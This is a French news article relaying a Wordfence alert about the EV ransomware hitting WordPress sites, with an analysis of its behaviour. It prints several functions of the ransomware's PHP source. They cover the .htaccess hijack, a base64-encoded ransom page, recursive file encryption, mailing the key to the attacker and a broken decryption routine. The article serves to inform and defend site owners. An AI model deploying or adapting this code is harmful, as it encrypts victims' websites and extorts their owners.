Alerte sécurité : le ransomware EV, une menace grandissante pour les sites WordPress
Depuis le mois dernier
Wordfence, l’équipe en charge de la sécurité des sites WordPress, vient de publier une alerte sécurité. Elle fait état de ce qu’un ransomware surnommé EV (par l’équipe Wordfence) cible de plus en plus les sites WordPress. La deuxième version (dont le code source a été publié sur GitHub depuis juillet 2016) est utilisée par des attaquants pour essayer de s’en prendre à des sites WordPress depuis le mois passé.
Un examen du code source révèle que l’attaque commence par une prise en otage du fichier .htaccess (comme en témoigne le bout de code source ci-dessous) créé automatiquement par WordPress lors de l’installation d’un site. Le fichier .htaccess étant renommé, le site est pratiquement muselé, puisque le serveur se retrouve orphelin de son fichier de configuration. Ne reste alors qu’à mettre les fichiers du site hors d’atteinte par la victime.
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11 public function shcpackInstall(){ if(!file_exists(".htashor7cut")){ rename(".htaccess", ".htashor7cut"); if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex shor7cut.php\r\nErrorDocument 404 /shor7cut.php")){ echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>'; } if(file_put_contents("shor7cut.php", base64_decode("PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgPHRpdGxlPkF3ZXNvbWVXYXJlPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCiAgICBiYWNrZ3JvdW5kOiAjMUExQzFGOw0KICAgIGNvbG9yOiAjZTJlMmUyOw0KfQ0KYXsNCiAgIGNvbG9yOmdyZWVuOw0KfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGNlbnRlcj4NCjxwcmU+DQogICAgICANCiAgICAgICAgICAgIC4tIiItLg0KICAgICAgICAgICAvIC4tLS4gXA0KICAgICAgICAgIC8gLyAgICBcIFwNCiAgICAgICAgICB8IHwgICAgfCB8DQogICAgICAgICAgfCB8Li0iIi0ufA0KICAgICAgICAgLy8vYC46Ojo6LmBcDQogICAgICAgIHx8fCA6Oi8gIFw6OiA7DQogICAgICAgIHx8OyA6OlxfXy86OiA7DQogICAgICAgICBcXFwgJzo6OjonIC8NCiAgICAgICAgICBgPSc6LS4uLSdgDQpZb3VyIHNpdGUgaXMgbG9ja2VkLCBwbGVhc2UgY29udGFjdCB2aWEgZW1haWw6DQogICAgIC1bIDxmb250IGNvbG9yPSJncmVlbiI+dG8xMzM3ZGF5W2F0XWdtYWlsLmNvbTwvZm9udD4gXS0NCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClRoaXMgaXMgYSBub3RpY2Ugb2YgPGEgaHJlZj0iaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUmFuc29td2FyZSI+cmFuc29td2FyZTwvYT4uPGJyPg0KSG93IHRvIHJlc3RvcmUgdGhlIGJlZ2lubmluZz8NClBsZWFzZSBjb250YWN0IHVzIHZpYSBlbWFpbCBsaXN0ZWQNCjwvcHJlPg0KPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"))){ echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> shor7cut.php (Default Page)<br>'; } } }
Le ransomware dispose d’une fonction de parcours (cf. fonction shcdirs ci-dessous) des répertoires de l’arborescence du site et de chiffrement des fichiers en leur sein. Les fichiers sont chiffrés en utilisant l’algorithme Rijndael 128 via un appel à la fonction shcEnCry (cf. code ci-dessous). Pour chacun des répertoires parcourus, l’attaquant reçoit (via un appel à la fonction report ci-dessous) la clé de chiffrement utilisée par courriel via une adresse à configurer d’avance.
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35 public function shcdirs($dir,$method,$key){ switch ($method) { case '1': deRanSomeware::shcpackInstall(); break; case '2': deRanSomeware::shcpackUnstall(); break; } foreach(scandir($dir) as $d) { if($d!='.' && $d!='..') { $locate = $dir.DIRECTORY_SEPARATOR.$d; if(!is_dir($locate)){ if( deRanSomeware::kecuali($locate,"AwesomeWare.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"shor7cut.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){ switch ($method) { case '1': deRanSomeware::shcEnCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"1"); break; case '2': deRanSomeware::shcDeCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"2"); break; } } }else{ deRanSomeware::shcdirs($locate,$method,$key); } } deRanSomeware::plus(); } deRanSomeware::report($key); }
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22 public function shcEnCry($key,$locate){ $data = file_get_contents($locate); $iv = mcrypt_create_iv( mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM ); $encrypted = base64_encode( $iv . mcrypt_encrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv ) ); if(file_put_contents($locate, $encrypted )){ echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>'; }else{ echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>'; } }
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9 public function report($key){ $message.= "========= Ronggolawe Ransomware =========\n"; $message.= "Website : ".$_SERVER['HTTP_HOST']; $message.= "Key : ".$key; $message.= "========= Ronggolawe (2016) Ransomware =========\n"; $subject = "Report Ransomeware"; $headers = "From: Ransomware <ransomeware@shor7cut.today>\r\n"; mail("-- YOUR EMAIL --",$subject,$message,$headers); }
Une fois le processus de chiffrement des fichiers achevé, la victime a droit au classique écran de demande de la rançon via lequel il pourra saisir une clé de chiffrement fournie par les attaquants en cas de paiement de la rançon. L’équipe Wordfence déconseille cependant aux victimes potentielles de procéder au paiement.
« Le ransomware documenté ici est incomplet parce que la fonction dédiée au déchiffrement des fichiers (cf.fonction shcDeCry ci-dessous) ne joue pas son rôle », a déclaré l’équipe Wordfence qui ajoute que « si vous êtes affecté par ce dernier ne procédez pas au paiement de la rançon puisqu’il est peu probable que les attaquants soient en réalité capables de déchiffrer vos fichiers. »
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19 public function shcDeCry($key,$locate){ $data = base64_decode( file_get_contents($locate) ); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim( mcrypt_decrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv ), "\0" ); if(file_put_contents($locate, $decrypted )){ echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>'; }else{ echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>'; } }
« Quand bien même ils vous fourniraient une clé, vous aurez besoin d’un développeur PHP expérimenté pour vous aider à réparer leur code afin de tirer profit de la clé et déchiffrer les fichiers », a ajouté l’équipe Wordfence.
Le malheur des potentielles victimes semble faire les affaires de l’équipe managériale de WordPress puisque la seule solution proposée par cette dernière est de se doter du pare-feu Wordfence disponible uniquement pour les utilisateurs premium.
Sources : Wordfence, GitHub
Et vous ?
Qu’en pensez-vous ?
Développez-vous des sites avec WordPress ? Quelles précautions comptez-vous prendre pour éviter d’être victime de cette menace ?
Voir aussi :
WordPress est de loin le CMS le plus ciblé par les cyberattaques en grande partie en raison du mauvais entretien et la négligence des webmasters
Partager